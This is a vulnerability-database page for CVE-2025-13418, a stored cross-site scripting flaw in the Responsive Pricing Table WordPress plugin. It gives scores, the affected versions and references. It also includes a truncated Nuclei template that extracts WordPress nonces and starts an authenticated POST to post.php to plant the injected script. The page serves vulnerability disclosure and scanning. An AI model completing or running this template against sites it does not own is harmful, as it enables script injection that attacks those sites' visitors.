CVE-2025-13418
published 2026-01-07CVE-2025-13418: The Responsive Pricing Table plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'plan_icons' parameter in all versions up to, and…
PriorityP339medium6.4CVSS 3.1
AVNACLPRLUINSCCLILAN
EXPLOIT
EPSS
0.60%
44.2th percentile
The Responsive Pricing Table plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'plan_icons' parameter in all versions up to, and including, 5.1.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| spwebguy | responsive_pricing_table | <= 5.1.12 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Nuclei
Responsive Pricing Table <= 5.1.12 - Cross-Site Scripting
nuclei·CVSS 6.4
CVE-2025-13418 [MEDIUM] Responsive Pricing Table <= 5.1.12 - Cross-Site Scripting
Responsive Pricing Table ]*value="([^"]+)"'
internal: true
- type: regex
part: body
name: dmb_nonce
group: 1
regex:
- 'name="dmb_rpts_meta_box_nonce"[^>]*value="([^"]+)"'
internal: true
- type: regex
part: body
name: post_id
group: 1
regex:
- "id=['\"]post_ID['\"][^>]*value=['\"]([0-9]+)['\"]"
internal: true
- type: regex
part: body
name: meta_nonce
group: 1
regex:
- 'name="meta-box-order-nonce"[^>]*value="([^"]+)"'
internal: true
- type: regex
part: body
name: closed_nonce
group: 1
regex:
- 'name="closedpostboxesnonce"[^>]*value="([^"]+)"'
internal: true
- raw:
- |
POST /wp-admin/post.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
_wpnonce={{wpnonce}}&_wp_http_referer=%2Fwp-admin%2Fpost-new.php%3Fpost_type%3Drpt_pricing_table&user_ID=1&action=editpos
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3435445%40dk-pricr-responsive-pricing-table&new=3435445%40dk-pricr-responsive-pricing-table&sfp_email=&sfph_mail=https://wordpress.org/plugins/dk-pricr-responsive-pricing-table/https://www.wordfence.com/threat-intel/vulnerabilities/id/5d28fd23-fa86-4353-b1b4-af61192f8482?source=cve
2026-01-07
Published